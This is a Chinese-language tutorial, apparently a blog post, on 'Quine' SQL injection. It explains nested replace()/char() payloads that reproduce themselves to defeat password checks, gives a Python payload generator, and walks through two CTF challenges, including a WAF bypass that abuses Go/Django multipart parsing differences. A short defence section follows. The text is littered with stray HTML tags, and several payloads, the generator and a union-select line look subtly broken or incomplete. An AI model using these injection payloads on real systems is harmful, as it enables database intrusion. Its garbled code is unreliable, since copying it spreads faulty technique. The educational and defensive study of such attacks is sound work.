Quine注入技术详解<\/h1>

1. Quine注入概述<\/h2>
Quine注入是一种特殊的SQL注入技术，其核心思想是利用自生成代码(Quine)<\/strong>的特性，构造一个Payload，使得注入的SQL代码在执行时能够自我复制<\/strong>或自我生成<\/strong>，实现输入输出一致，从而绕过各种安全限制。<\/p>

2. 基础概念与函数<\/h2>
2.1 replace()函数<\/h3>
Quine注入主要依赖于SQL中的replace()<\/code>函数，其语法如下：<\/p>
replace(str, from_str, to_str) <\/code><\/pre> 参数说明：<\/p> str<\/code>：原始字符串，需要进行替换的字符串<\/li> from_str<\/code>：需要被替换的子字符串<\/li> to_str<\/code>：替换后的新子字符串<\/li> <\/ul> 如果from_str<\/code>不存在于str<\/code>中，则返回原始字符串。<\/p> 2.2 ASCII字符表示<\/h3> 在构造Quine时，常用ASCII字符的数值表示：<\/p> char(46)<\/code>表示.<\/code><\/li> char(34)<\/code>表示"<\/code>（双引号）<\/li> char(39)<\/code>表示'<\/code>（单引号）<\/li> <\/ul> 3. Quine构造原理<\/h2> 3.1 基本构造过程<\/h3> 初始构造：<\/li> <\/ol> replace<\/span>("."<\/span>,char(46<\/span>),"."<\/span>) <\/span><\/span><\/code><\/pre>这个语句会返回.<\/code>，因为将.<\/code>替换为.<\/code>（即不变）<\/p> 进一步替换：<\/li> <\/ol> replace<\/span>("replace(\"<\/span>.\<\/span>",char(46),\"<\/span>.\<\/span>")"<\/span>,"."<\/span>,char(46<\/span>)) <\/span><\/span><\/code><\/pre>这个语句将replace(".",char(46),".")<\/code>中的.<\/code>替换为char(46)<\/code>，结果接近原始输入<\/p> 3.2 解决引号问题<\/h3> 初始构造存在单双引号不一致的问题，解决方案：<\/p> replace<\/span>(replace<\/span>('.'<\/span>,char(39<\/span>),replace<\/span>('.'<\/span>,char(46<\/span>),'.'<\/span>)),'.'<\/span>,char(46<\/span>)) <\/span><\/span><\/code><\/pre>解析：<\/p> 内层replace('.',char(46),'.')<\/code>返回'.'<\/code><\/li> 外层将'.'<\/code>中的'<\/code>替换为replace('.',char(46),'.')<\/code>，即'.'<\/code><\/li> 最终返回'.'<\/code>，解决了引号不一致问题<\/li> <\/ol> 3.3 最终Payload<\/h3> 完整的Quine注入Payload形式：<\/p> replace<\/span>(replace<\/span>('replace(replace(\'<\/span>.\<\/span>',char(39),replace(\'<\/span>.\<\/span>',char(46),\'<\/span>.\<\/span>')),\'<\/span>\<\/span>',char(46))'<\/span>,char(39<\/span>),replace<\/span>('replace(replace(\'<\/span>.\<\/span>',char(39),replace(\'<\/span>.\<\/span>',char(46),\'<\/span>.\<\/span>')),\'<\/span>\<\/span>',char(46))'<\/span>,char(46<\/span>),'replace(replace(\'<\/span>.\<\/span>',char(39),replace(\'<\/span>.\<\/span>',char(46),\'<\/span>.\<\/span>')),\'<\/span>\<\/span>',char(46))'<\/span>)),'\'<\/span>,char(46<\/span>)) <\/span><\/span><\/code><\/pre>4. 实用脚本<\/h2> 以下是一个自动生成Quine注入Payload的Python脚本：<\/p> def<\/span> generate_quine<\/span>(): <\/span><\/span> base =<\/span> "replace('.',char(46),'.')"<\/span> <\/span><\/span> step1 =<\/span> f<\/span>"replace(<\/span>{<\/span>base}<\/span>,'.',char(46))"<\/span> <\/span><\/span> step2 =<\/span> f<\/span>"replace('<\/span>{<\/span>step1}<\/span>',char(39),'<\/span>{<\/span>step1}<\/span>')"<\/span> <\/span><\/span> step3 =<\/span> f<\/span>"replace(<\/span>{<\/span>step2}<\/span>,'.',char(46))"<\/span> <\/span><\/span> return<\/span> step3 <\/span><\/span> <\/span><\/span>print(generate_quine()) <\/span><\/span><\/code><\/pre>5. 实际案例分析<\/h2> 5.1 [第五空间 2021]yet_another_mysql_injection<\/h3> 题目特点<\/strong>：<\/p> 检查username是否为admin<\/li> 过滤了大多数盲注函数<\/li> 过滤了空格<\/li> 对password进行强类型比较<\/li> <\/ul> 解决方案<\/strong>：使用Quine注入Payload，将空格替换为\/**\/<\/code>等注释形式绕过过滤。<\/p> 5.2 [TPCTF2025]supersqli<\/h3> 题目特点<\/strong>：<\/p> 存在SQL注入漏洞<\/li> 有严格的WAF过滤<\/li> 存在解析差异可利用<\/li> <\/ul> 绕过技巧<\/strong>：<\/p> 利用Go和Django对multipart请求处理的差异： Go使用boundary分割<\/li> Django使用Content-Disposition分割<\/li> <\/ul> <\/li> 构造特殊请求头绕过WAF检测<\/li> 使用Quine注入Payload，确认为两列后使用： 1<\/span>' union select 1,2,--+ <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 6. 防御措施<\/h2> 针对Quine注入的防御建议：<\/p> 使用参数化查询（预编译语句）<\/li> 严格过滤和转义特殊字符<\/li> 限制数据库函数的使用权限<\/li> 实现多层次的WAF规则<\/li> 统一不同组件对请求的解析方式<\/li> <\/ol> 7. 参考资源<\/h2> SQL注入高级技巧：Quine注入<\/a><\/li> OWASP SQL注入防御指南<\/li> MySQL官方安全文档<\/li> <\/ul> 通过深入理解Quine注入的原理和构造方法，安全研究人员可以更好地发现和防御这类高级SQL注入攻击。<\/p>